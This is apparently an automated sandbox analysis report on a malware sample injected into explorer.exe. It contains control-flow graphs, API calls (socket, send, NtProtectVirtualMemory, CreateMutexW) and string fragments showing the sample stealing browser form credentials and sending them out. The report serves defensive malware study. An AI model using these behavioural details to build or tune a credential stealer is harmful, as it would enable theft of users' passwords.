e5d97b1-e5d97b2 164->167 168 e5d97a2-e5d97af 164->168 170 e5d97b8-e5d97c4 167->170 168->167 168->170 173 e5d97f4-e5d9861 setsockopt recv 170->173 174 e5d97c6-e5d97ef call e5d9d92 call e5d9d62 170->174 175 e5d98a3-e5d98a4 173->175 176 e5d9863 173->176 174->173 175->154 176->175 179 e5d9865-e5d986a 176->179 179->175 182 e5d986c-e5d9872 179->182 182->175 185 e5d9874-e5d98a1 182->185 185->175 185->176
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: getaddrinforecvsetsockopt
                                                                                                                • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                • API String ID: 1564272048-1117930895
                                                                                                                • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                • Instruction ID: 55189791489ebff11fa7f22e576c9a0da314512d1a2ce71461d626a20de3825d
                                                                                                                • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                • Instruction Fuzzy Hash: CB527130618A498BCB69EF6CC4947EAB7E1FB94300F544E2EC59FC7146EE70A949C781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 299 e5d8232-e5d8256 300 e5d88bd-e5d88cd 299->300 301 e5d825c-e5d8260 299->301 301->300 302 e5d8266-e5d82a0 301->302 303 e5d82bf 302->303 304 e5d82a2-e5d82a6 302->304 306 e5d82c6 303->306 304->303 305 e5d82a8-e5d82ac 304->305 307 e5d82ae-e5d82b2 305->307 308 e5d82b4-e5d82b8 305->308 309 e5d82cb-e5d82cf 306->309 307->306 308->309 310 e5d82ba-e5d82bd 308->310 311 e5d82f9-e5d830b 309->311 312 e5d82d1-e5d82f7 call e5d8942 309->312 310->309 316 e5d8378 311->316 317 e5d830d-e5d8332 311->317 312->311 312->316 318 e5d837a-e5d83a0 316->318 319 e5d8334-e5d833b 317->319 320 e5d83a1-e5d83a8 317->320 323 e5d833d-e5d8360 call e5d8942 319->323 324 e5d8366-e5d8370 319->324 321 e5d83aa-e5d83d3 call e5d8942 320->321 322 e5d83d5-e5d83dc 320->322 321->316 321->322 328 e5d83de-e5d840a call e5d8942 322->328 329 e5d8410-e5d8458 NtCreateFile call e5d8172 322->329 323->324 324->316 326 e5d8372-e5d8373 324->326 326->316 328->316 328->329 334 e5d845d-e5d845f 329->334 334->316 336 e5d8465-e5d846d 334->336 336->316 337 e5d8473-e5d8476 336->337 338 e5d8478-e5d8481 337->338 339 e5d8486-e5d848d 337->339 338->318 340 e5d848f-e5d84b8 call e5d8942 339->340 341 e5d84c2-e5d84ec 339->341 340->316 346 e5d84be-e5d84bf 340->346 347 e5d88ae-e5d88b8 341->347 348 e5d84f2-e5d84f5 341->348 346->341 347->316 349 e5d84fb-e5d84fe 348->349 350 e5d8604-e5d8611 348->350 351 e5d855e-e5d8561 349->351 352 e5d8500-e5d8507 349->352 350->318 357 e5d8567-e5d8572 351->357 358 e5d8616-e5d8619 351->358 354 e5d8509-e5d8532 call e5d8942 352->354 355 e5d8538-e5d8559 352->355 354->316 354->355 362 e5d85e9-e5d85fa 355->362 363 e5d8574-e5d859d call e5d8942 357->363 364 e5d85a3-e5d85a6 357->364 360 e5d861f-e5d8626 358->360 361 e5d86b8-e5d86bb 358->361 368 e5d8628-e5d8651 call e5d8942 360->368 369 e5d8657-e5d866b call e5d9e92 360->369 365 e5d86bd-e5d86c4 361->365 366 e5d8739-e5d873c 361->366 362->350 363->316 363->364 364->316 371 e5d85ac-e5d85b6 364->371 372 e5d86f5-e5d8734 365->372 373 e5d86c6-e5d86ef call e5d8942 365->373 375 e5d87c4-e5d87c7 366->375 376 e5d8742-e5d8749 366->376 368->316 368->369 369->316 391 e5d8671-e5d86b3 369->391 371->316 379 e5d85bc-e5d85e6 371->379 395 e5d8894-e5d88a9 372->395 373->347 373->372 375->316 380 e5d87cd-e5d87d4 375->380 383 e5d874b-e5d8774 call e5d8942 376->383 384 e5d877a-e5d87bf 376->384 379->362 386 e5d87fc-e5d8803 380->386 387 e5d87d6-e5d87f6 call e5d8942 380->387 383->347 383->384 384->395 393 e5d882b-e5d8835 386->393 394 e5d8805-e5d8825 call e5d8942 386->394 387->386 391->318 393->347 400 e5d8837-e5d883e 393->400 394->393 395->318 400->347 404 e5d8840-e5d8886 400->404 404->395
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID: `
                                                                                                                • API String ID: 823142352-2679148245
                                                                                                                • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                • Instruction ID: 5f4f98ff150f6b3b286c6058dab4573e522907fc218e9f3661a50d6a159fa173
                                                                                                                • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                • Instruction Fuzzy Hash: 3F222970A18E099FCB6DDF6CC8956AAB7E1FB98301F404A2ED45ED3250DB30E855CB85
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 443 e5d9e12-e5d9e6e call e5d8942 NtProtectVirtualMemory 446 e5d9e7d-e5d9e8f 443->446 447 e5d9e70-e5d9e7c 443->447
                                                                                                                APIs
                                                                                                                • NtProtectVirtualMemory.NTDLL ref: 0E5D9E67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2706961497-0
                                                                                                                • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                • Instruction ID: 77c330842fdb7f31467eb33d4b446a18e9005b3d04af1ce0901282c6a2e93fcc
                                                                                                                • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                • Instruction Fuzzy Hash: BC019E34628B484F8B88EFAC948022AB7E4FBC9214F000B3EA99AC3250EB60C9414742
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 448 e5d9e0a-e5d9e38 449 e5d9e45-e5d9e6e NtProtectVirtualMemory 448->449 450 e5d9e40 call e5d8942 448->450 451 e5d9e7d-e5d9e8f 449->451 452 e5d9e70-e5d9e7c 449->452 450->449
                                                                                                                APIs
                                                                                                                • NtProtectVirtualMemory.NTDLL ref: 0E5D9E67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2706961497-0
                                                                                                                • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                • Instruction ID: 8a70b188782b5d109075046d9d9ae8c1f06dd14d89bc5f5e18cf1fab4f8f06eb
                                                                                                                • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                • Instruction Fuzzy Hash: 7601A23462CB884B8B48EB6C94412A6B3E5FBCE314F000B3EE9DAC3240DB61D9064782
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • ObtainUserAgentString.URLMON ref: 0E5D39A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AgentObtainStringUser
                                                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                • API String ID: 2681117516-319646191
                                                                                                                • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                • Instruction ID: c192e4299119fc49a5dce016539e9b181f7c1fab37b9beb73fc770a7cf703f2e
                                                                                                                • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                • Instruction Fuzzy Hash: E231D471614A4D8BCB15EFA8C8847EEB7E4FB98205F400A2AD54ED7240DF748A49C78A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • ObtainUserAgentString.URLMON ref: 0E5D39A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AgentObtainStringUser
                                                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                • API String ID: 2681117516-319646191
                                                                                                                • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                • Instruction ID: 76ad1d26c6e499cb804382e41110c66ea4d8a0688c903d9b9777efabc2d9b54a
                                                                                                                • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                • Instruction Fuzzy Hash: 2221E670618A4D8BCF15EFACC8847EE7BE4FF98205F404A1AD55AD7240DF748A49C78A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 232 e5cfb66-e5cfb68 233 e5cfb6a-e5cfb71 232->233 234 e5cfb93-e5cfbb8 232->234 236 e5cfbbb-e5cfc22 call e5d6612 call e5d8942 * 2 233->236 237 e5cfb73-e5cfb92 233->237 234->236 244 e5cfcdc 236->244 245 e5cfc28-e5cfc2b 236->245 237->234 246 e5cfcde-e5cfcf6 244->246 245->244 247 e5cfc31-e5cfcd3 call e5dada4 call e5da022 call e5da3e2 call e5da022 call e5da3e2 CreateMutexW 245->247 247->244 261 e5cfcd5-e5cfcda 247->261 261->246
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutex
                                                                                                                • String ID: .dll$el32$kern
                                                                                                                • API String ID: 1964310414-1222553051
                                                                                                                • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                • Instruction ID: 4e7219a791e1dce77201bab75e13c09cac2db1d8123913387c6e5ef07a0c44c7
                                                                                                                • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                • Instruction Fuzzy Hash: A4418D70A18A0C8FCB54EFA8C8947AD77E1FF98300F044A7AC94ADB255DE349945CB85
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutex
                                                                                                                • String ID: .dll$el32$kern
                                                                                                                • API String ID: 1964310414-1222553051
                                                                                                                • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                • Instruction ID: 79b7bb86eb0bad09b575e2ecab06d0a43f7217f75899f174cd2e68377b93e1f5
                                                                                                                • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                • Instruction Fuzzy Hash: 23417C70A18A088FCB54EFA8C4957ED77F1FB98300F04497AC94EDB256DE349945CB85
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 289 e5d572e-e5d5768 290 e5d5788-e5d57ab connect 289->290 291 e5d576a-e5d5782 call e5d8942 289->291 291->290
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: connect
                                                                                                                • String ID: conn$ect
                                                                                                                • API String ID: 1959786783-716201944
                                                                                                                • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                • Instruction ID: 2e7190a0e2acbf5445463185a9e4015525562227a42b973146848ef50ae1d5a9
                                                                                                                • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                • Instruction Fuzzy Hash: FE015E30618B188FCB94EF5CE088B55B7E0FB58324F1545AED90DCB226C674DC858BC2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 294 e5d5732-e5d5768 295 e5d5788-e5d57ab connect 294->295 296 e5d576a-e5d5782 call e5d8942 294->296 296->295
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: connect
                                                                                                                • String ID: conn$ect
                                                                                                                • API String ID: 1959786783-716201944
                                                                                                                • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                • Instruction ID: cecdeb2b0e2def80c9c242102c2f061fe90148601486dbfdd26d6307b368d9a0
                                                                                                                • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                • Instruction Fuzzy Hash: 68012170618A1C8FCB94EF5CE048B5577E0FB59314F1545AE990DCB226C674CD858BC2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 407 e5d56b2-e5d56e5 408 e5d5705-e5d572d send 407->408 409 e5d56e7-e5d56ff call e5d8942 407->409 409->408
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: send
                                                                                                                • String ID: send
                                                                                                                • API String ID: 2809346765-2809346765
                                                                                                                • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                • Instruction ID: 195cfcc4242f7c6c897ddf4c01f8cfcbf386630714c82366ac365dcd0778074a
                                                                                                                • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                • Instruction Fuzzy Hash: F501527051CA088FCB88EF5CD048B2577E0FB58314F1545AED85DCB266C670D8818B81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 412 e5d55b2-e5d55ea 413 e5d55ec-e5d5604 call e5d8942 412->413 414 e5d560a-e5d562b socket 412->414 413->414
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: socket
                                                                                                                • String ID: sock
                                                                                                                • API String ID: 98920635-2415254727
                                                                                                                • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                • Instruction ID: 485a8deb25d0f85b6beb3467c7f18ce093e67f5fd685a5d595ab34ca4657b370
                                                                                                                • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                • Instruction Fuzzy Hash: 32012C70618A188FCB84EF5CE048B54BBE0FB59314F1545AEE85ECB266D7B0C985CB86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 417 e5cd2dd-e5cd320 call e5d8942 420 e5cd3fa-e5cd40e 417->420 421 e5cd326 417->421 422 e5cd328-e5cd339 SleepEx 421->422 422->422 423 e5cd33b-e5cd341 422->423 424 e5cd34b-e5cd352 423->424 425 e5cd343-e5cd349 423->425 427 e5cd354-e5cd35a 424->427 428 e5cd370-e5cd376 424->428 425->424 426 e5cd35c-e5cd36a call e5d7f12 425->426 426->428 427->426 427->428 429 e5cd378-e5cd37e 428->429 430 e5cd3b7-e5cd3bd 428->430 429->430 432 e5cd380-e5cd38a 429->432 433 e5cd3bf-e5cd3cf call e5cde72 430->433 434 e5cd3d4-e5cd3db 430->434 432->430 436 e5cd38c-e5cd3b1 call e5ce432 432->436 433->434 434->422 438 e5cd3e1-e5cd3f5 call e5cd0f2 434->438 436->430 438->422
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                • Instruction ID: 10a18e1e937a8dcc4b927e8d10d390165f364d83a77aec0d47f3f1e1143e0cc5
                                                                                                                • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                • Instruction Fuzzy Hash: 82316CB4614B09DEDB64AFA980A82A5F7F0FB54300F444A7EC91DCB106CB749855CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 453 e5cd412-e5cd446 call e5d8942 456 e5cd448-e5cd472 call e5dac9e CreateThread 453->456 457 e5cd473-e5cd47d 453->457
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102156479.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                • Instruction ID: 2bc6ad2ee620857cf99455f0b2e9b30a0fa8c02a04dfd550f0847c371edabd31
                                                                                                                • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                • Instruction Fuzzy Hash: 22F0FC30268B494FD788EF6CD44563AF3E0FBE8215F45093EA64DC3264DA75C9814716
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                • API String ID: 0-393284711
                                                                                                                • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                • Instruction ID: 660ffb7ccb24fe7aeef512b39315e7cd185ef7276f2fd0bd39192027a865b4b6
                                                                                                                • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                • Instruction Fuzzy Hash: 9DE17B70518F488FD769EF68C4847ABB7E1FB58300F404A2E999BC7241DF74A541CB85
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                • API String ID: 0-2916316912
                                                                                                                • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                • Instruction ID: 0eb96f42b71ba9a15f1148ef32383f2b2c36085a5750f8ae449e1b8ebb7fb212
                                                                                                                • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                • Instruction Fuzzy Hash: 81B19D30618B488EDB15EF69C485AEEB7F1FF98300F40461ED89AC7252EF74A505CB86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                • API String ID: 0-1539916866
                                                                                                                • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                • Instruction ID: ef78a39535292e8ba3bd39f431f38789e10eca5af9e81df0b307238ffaa3b896
                                                                                                                • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                • Instruction Fuzzy Hash: 18418C70A18B08CFDB14DF88A4456BE7BE7EB8C700F40025ED849D7386DBB5A9458BD6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                • API String ID: 0-355182820
                                                                                                                • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                • Instruction ID: 5b7b667170ebfcec849fe08192a45418693b531359e19922958c66189da26d4a
                                                                                                                • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                • Instruction Fuzzy Hash: 7DC19C70218B099FD758EF28D485AEAF3E1FB98304F40472E999AD7201DF74B615CB86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                • API String ID: 0-97273177
                                                                                                                • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                • Instruction ID: 1f2d66a085e6aa6124b161860e5af5ed77176a7c3bb1fd9ee129adfc597c7ca9
                                                                                                                • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                • Instruction Fuzzy Hash: 2F51E6701187488FE71ADF18C4852AAB7E5FBC5700F501A2FE8CBD7242DBB4A546CB82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                • API String ID: 0-639201278
                                                                                                                • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                • Instruction ID: f6992aa5a7257718913cd2c8bb50999ba116808f2c26944c53dc60cbf9c9230a
                                                                                                                • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                • Instruction Fuzzy Hash: 4FC1C230A18B194FC758EF68D455AAAF3E1FB98300F81432E984AD7252DF34E646CB85
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                • API String ID: 0-639201278
                                                                                                                • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
